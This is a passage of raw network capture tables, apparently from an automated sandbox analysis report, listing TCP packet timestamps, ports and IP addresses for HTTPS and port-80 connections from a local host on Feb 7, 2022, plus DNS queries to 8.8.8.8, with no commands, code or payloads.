                                                          Feb 7, 2022 12:04:16.818820000 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.818903923 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.818970919 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819030046 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819078922 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819188118 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819201946 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819215059 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819217920 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819224119 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819231987 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819257021 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819317102 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819365978 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819405079 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819449902 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819490910 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819530964 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819571018 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819571018 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819576979 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819586039 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819590092 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819593906 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819689035 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819731951 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819772959 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819813013 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819852114 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819890976 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819930077 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819933891 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819941044 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819947958 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.819966078 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819969893 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.819972038 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.820033073 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.820126057 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.820168018 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.820214987 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.820264101 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.820306063 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.820312977 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.820319891 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.820322990 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835016012 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835071087 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835114956 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835222006 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835235119 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835242987 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835246086 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835319042 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835377932 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835541010 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835558891 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835572958 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835581064 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835583925 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835587025 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835639000 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835725069 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835863113 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835864067 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835866928 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.835879087 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.835926056 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.836025953 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.836112022 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.836133957 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836143970 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.836153030 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836157084 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836159945 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836163044 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836246967 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.836776972 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836786985 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.836793900 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.836863041 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.837567091 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.852715015 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.852900028 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853050947 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853193998 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853274107 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.853290081 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853302002 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.853307009 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.853311062 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.853343010 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853439093 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.853454113 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853704929 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.853774071 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.853786945 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854027033 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854104996 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854119062 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854147911 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854279995 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854281902 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854305983 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854378939 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854408026 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854505062 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854546070 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854559898 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854583979 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854599953 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854676008 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854690075 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854708910 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854764938 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854809046 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.854897976 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.854911089 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855004072 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855027914 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.855040073 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855098963 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855134964 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.855170965 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855185986 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.855199099 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855237007 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.855249882 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.855257988 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855304003 CET44349811162.159.129.233192.168.2.3
                                                          Feb 7, 2022 12:04:16.855385065 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:16.870094061 CET49811443192.168.2.3162.159.129.233
                                                          Feb 7, 2022 12:04:18.185244083 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:18.185282946 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:18.186553955 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:18.467503071 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:18.467530012 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:18.505434990 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:18.505887032 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:18.508368015 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:18.508657932 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:18.660752058 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:18.977185965 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.017879963 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018192053 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018297911 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018336058 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018373013 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018414021 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018431902 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.018460035 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018464088 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.018472910 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018532991 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018538952 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.018551111 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018620014 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018642902 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018678904 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018722057 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018763065 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018805027 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018846989 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018865108 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.018903971 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018949986 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.018982887 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019016027 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019047022 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019078970 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019112110 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019145012 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019180059 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019211054 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.019220114 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019232988 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019283056 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019314051 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019346952 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019381046 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019412041 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019443989 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019478083 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019510031 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019540071 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.019547939 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019562006 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019610882 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019644976 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019680977 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019725084 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019733906 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019814014 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.019840002 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.019942045 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.034358978 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.034372091 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.034482956 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.034928083 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.034989119 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035029888 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.035047054 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035064936 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035065889 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.035126925 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035172939 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.035185099 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035227060 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.035800934 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035852909 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035891056 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.035912037 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035928011 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.035959959 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.035990953 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036004066 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036012888 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036041975 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036055088 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036115885 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036118031 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036127090 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036160946 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036180019 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036206961 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036216974 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036231041 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036246061 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036292076 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036299944 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036334038 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036381960 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036412954 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036423922 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036439896 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036478996 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036514997 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.036524057 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.036581039 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.037972927 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.038934946 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051353931 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051501036 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051502943 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051527023 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051547050 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051589012 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051599979 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051628113 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051688910 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051712036 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051774025 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051796913 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051861048 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051881075 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.051944017 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.051969051 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052030087 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.052052021 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052110910 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.052145004 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052201986 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.052227020 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052287102 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.052314997 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052388906 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.052391052 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052405119 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052452087 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.052542925 CET44349820162.159.134.233192.168.2.3
                                                          Feb 7, 2022 12:04:19.052602053 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:04:19.059681892 CET49820443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:06:19.441752911 CET4982280192.168.2.334.98.99.30
                                                          Feb 7, 2022 12:06:19.460413933 CET804982234.98.99.30192.168.2.3
                                                          Feb 7, 2022 12:06:19.460694075 CET4982280192.168.2.334.98.99.30
                                                          Feb 7, 2022 12:06:19.460807085 CET4982280192.168.2.334.98.99.30
                                                          Feb 7, 2022 12:06:19.479219913 CET804982234.98.99.30192.168.2.3
                                                          Feb 7, 2022 12:06:19.575987101 CET804982234.98.99.30192.168.2.3
                                                          Feb 7, 2022 12:06:19.576046944 CET804982234.98.99.30192.168.2.3
                                                          Feb 7, 2022 12:06:19.576277971 CET4982280192.168.2.334.98.99.30
                                                          Feb 7, 2022 12:06:19.576369047 CET4982280192.168.2.334.98.99.30
                                                          Feb 7, 2022 12:06:19.592752934 CET804982234.98.99.30192.168.2.3
                                                          Feb 7, 2022 12:06:24.629154921 CET4982380192.168.2.315.197.142.173
                                                          Feb 7, 2022 12:06:24.647340059 CET804982315.197.142.173192.168.2.3
                                                          Feb 7, 2022 12:06:24.647723913 CET4982380192.168.2.315.197.142.173
                                                          Feb 7, 2022 12:06:24.647994995 CET4982380192.168.2.315.197.142.173
                                                          Feb 7, 2022 12:06:24.665992975 CET804982315.197.142.173192.168.2.3
                                                          Feb 7, 2022 12:06:24.844214916 CET804982315.197.142.173192.168.2.3
                                                          Feb 7, 2022 12:06:24.844248056 CET804982315.197.142.173192.168.2.3
                                                          Feb 7, 2022 12:06:24.844501019 CET4982380192.168.2.315.197.142.173
                                                          Feb 7, 2022 12:06:24.844587088 CET4982380192.168.2.315.197.142.173
                                                          Feb 7, 2022 12:06:24.862922907 CET804982315.197.142.173192.168.2.3
                                                          Feb 7, 2022 12:06:29.878108978 CET4982480192.168.2.3104.21.21.198
                                                          Feb 7, 2022 12:06:29.894517899 CET8049824104.21.21.198192.168.2.3
                                                          Feb 7, 2022 12:06:29.894691944 CET4982480192.168.2.3104.21.21.198
                                                          Feb 7, 2022 12:06:29.936054945 CET4982480192.168.2.3104.21.21.198
                                                          Feb 7, 2022 12:06:29.952367067 CET8049824104.21.21.198192.168.2.3
                                                          Feb 7, 2022 12:06:30.400813103 CET8049824104.21.21.198192.168.2.3
                                                          Feb 7, 2022 12:06:30.400840998 CET8049824104.21.21.198192.168.2.3
                                                          Feb 7, 2022 12:06:30.401114941 CET4982480192.168.2.3104.21.21.198
                                                          Feb 7, 2022 12:06:30.401202917 CET4982480192.168.2.3104.21.21.198
                                                          Feb 7, 2022 12:06:30.401444912 CET8049824104.21.21.198192.168.2.3
                                                          Feb 7, 2022 12:06:30.402967930 CET4982480192.168.2.3104.21.21.198
                                                          Feb 7, 2022 12:06:35.473583937 CET4982580192.168.2.3212.123.41.108
                                                          Feb 7, 2022 12:06:35.489948034 CET8049825212.123.41.108192.168.2.3
                                                          Feb 7, 2022 12:06:35.490039110 CET4982580192.168.2.3212.123.41.108
                                                          Feb 7, 2022 12:06:35.490160942 CET4982580192.168.2.3212.123.41.108
                                                          Feb 7, 2022 12:06:35.506484985 CET8049825212.123.41.108192.168.2.3
                                                          Feb 7, 2022 12:06:35.506536007 CET8049825212.123.41.108192.168.2.3
                                                          Feb 7, 2022 12:06:35.507205963 CET4982580192.168.2.3212.123.41.108
                                                          Feb 7, 2022 12:06:35.507311106 CET4982580192.168.2.3212.123.41.108
                                                          Feb 7, 2022 12:06:35.523578882 CET8049825212.123.41.108192.168.2.3
                                                          Feb 7, 2022 12:06:40.551358938 CET4982680192.168.2.334.102.136.180
                                                          Feb 7, 2022 12:06:40.567780018 CET804982634.102.136.180192.168.2.3
                                                          Feb 7, 2022 12:06:40.567986012 CET4982680192.168.2.334.102.136.180
                                                          Feb 7, 2022 12:06:40.568495035 CET4982680192.168.2.334.102.136.180
                                                          Feb 7, 2022 12:06:40.584728003 CET804982634.102.136.180192.168.2.3
                                                          Feb 7, 2022 12:06:40.683562040 CET804982634.102.136.180192.168.2.3
                                                          Feb 7, 2022 12:06:40.683590889 CET804982634.102.136.180192.168.2.3
                                                          Feb 7, 2022 12:06:40.683804035 CET4982680192.168.2.334.102.136.180
                                                          Feb 7, 2022 12:06:40.683907986 CET4982680192.168.2.334.102.136.180
                                                          Feb 7, 2022 12:06:40.988970995 CET4982680192.168.2.334.102.136.180
                                                          Feb 7, 2022 12:06:41.005453110 CET804982634.102.136.180192.168.2.3

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Feb 7, 2022 12:02:45.765486002 CET6078453192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:02:45.784912109 CET53607848.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:03:21.481326103 CET5600953192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:03:21.502005100 CET53560098.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:04:15.859920979 CET5836153192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:04:15.881500959 CET53583618.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:04:18.113322973 CET5361553192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:04:18.135062933 CET53536158.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:06:19.404110909 CET5072853192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:19.426031113 CET53507288.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:06:24.586600065 CET5377753192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:24.626717091 CET53537778.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:06:29.851387978 CET5710653192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:29.876291037 CET53571068.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:06:35.449697971 CET6035253192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:35.471623898 CET53603528.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:06:40.527426004 CET5677353192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:40.548983097 CET53567738.8.8.8192.168.2.3
